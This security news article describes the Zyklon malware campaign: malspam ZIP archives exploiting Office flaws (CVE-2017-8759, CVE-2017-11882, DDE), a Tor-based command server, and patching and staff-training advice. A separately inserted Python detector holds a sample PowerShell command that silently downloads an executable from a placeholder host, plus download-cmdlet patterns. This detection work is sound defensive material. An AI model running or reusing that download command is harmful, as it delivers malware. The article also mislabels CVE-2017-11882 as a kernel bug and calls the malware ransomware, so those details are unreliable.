Zyklon malware exploits three Microsoft Office vulnerabilities

Zyklon malware targets telecommunication, financial and insurance industries by exploiting MS Office vulnerabilities


First discovered in 2016, Zyklon malware[1] was noticed spreading via malicious spam emails in January 2018. The new malspam campaign targets companies that provide financial, insurance and telecommunication services.

According to FireEye research data,[2] the malware takes advantage of three flaws in Microsoft Office:

  • CVE-2017-8759, which is used for tricking the user into opening an obfuscated file;
  • CVE-2017-11882 (an RCE vulnerability), which allows downloading malicious content to the targeted device;
  • Dynamic Data Exchange Protocol (DDE), which helps attackers perform remote code execution.

Interestingly, the CVE-2017-11882 vulnerability is the same 17-year-old programming error in Windows Kernel[3] that was finally patched in November 2017. However, companies often do not rush to install the recommended updates that would strengthen cyber security and help avoid cyber attacks, and criminals are aware of that.

Emails with Zyklon have a ZIP attachment

Cyber criminals launched a malspam campaign that tricks company workers into opening an obfuscated ZIP archive attached to the email. The archive includes a DOC file that is designed to exploit the previously mentioned MS Office vulnerabilities and run a PowerShell script to download and execute Zyklon on the system.
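A defender-side check for the chain described above, added here as an example (it is not code from FireEye or from the original article): it flags an Office process starting a script host and raises the severity when the command line looks like a download step. The pipe-separated event format, the process-name lists and the sample events are constructed assumptions.

```python
import re

# Office processes that should not normally start a script host (assumed list).
# eqnedt32.exe is the Equation Editor component affected by CVE-2017-11882.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line fragments typical of a download-and-execute stage.
DOWNLOAD_HINTS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|\s-e(nc|ncodedcommand)?\s",
    re.IGNORECASE,
)

# Constructed sample events: parent image | child image | child command line.
SAMPLE_EVENTS = """\
C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/a','x.exe')
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell Get-ChildItem
C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE|C:\\Windows\\System32\\cmd.exe|cmd /c dir
C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE|C:\\Windows\\splwow64.exe|splwow64.exe 8192
"""

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(parent, child, cmdline):
    """Return 'high', 'medium' or None for one process-creation event."""
    if basename(parent) not in OFFICE_PARENTS or basename(child) not in SCRIPT_HOSTS:
        return None
    return "high" if DOWNLOAD_HINTS.search(cmdline) else "medium"

def scan(text):
    """Return (line number, severity, parent, child) for each suspicious event."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        parts = line.split("|", 2)  # the command line itself may contain '|'
        if len(parts) != 3:
            continue  # skip malformed lines
        severity = classify(*parts)
        if severity:
            findings.append((n, severity, basename(parts[0]), basename(parts[1])))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```
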

Once executed, the malware establishes a connection with its Command and Control (C&C) server over the Tor network. The C&C server can respond with specific tasks for the malware to perform. These tasks might include:

  • launching various types of DDoS attacks;
  • keylogging;
  • stealing passwords saved in web browsers;
  • installing the plugins needed for crypto-currency mining.

One of the interesting features of the ransomware is the ability to self-update and remove itself if needed. However, the malware should not be expected to delete itself before its creators get what they want.

Installing patches and educating employees are important to prevent malware infiltration

The majority of companies overlook an important security tip: keep software and the operating system up to date. Outdated programs might have flaws that cyber criminals can exploit to compromise systems and networks.[4]

As we mentioned at the beginning, Zyklon malware takes advantage of vulnerabilities that were patched a couple of months ago. Therefore, companies can avoid the attack by installing the patches.

Additionally, it is important to educate employees in order to decrease the risk of someone opening a malicious email attachment. Criminals are good at social engineering and create convincing, legitimate-looking emails. As a result, users open attached archives or documents without suspecting anything harmful.

The first sign that an email might be dangerous and contain harmful content is its appearance in the spam folder.[5] Furthermore, users are advised to look out for grammar mistakes, check information about the sender, and scan attachments with online file scanners before opening them.

About the author
Ugnius Kiguolis

Ugnius Kiguolis is a professional malware analyst who is also the founder and the owner of 2-Spyware. At the moment, he takes over as Editor-in-chief.
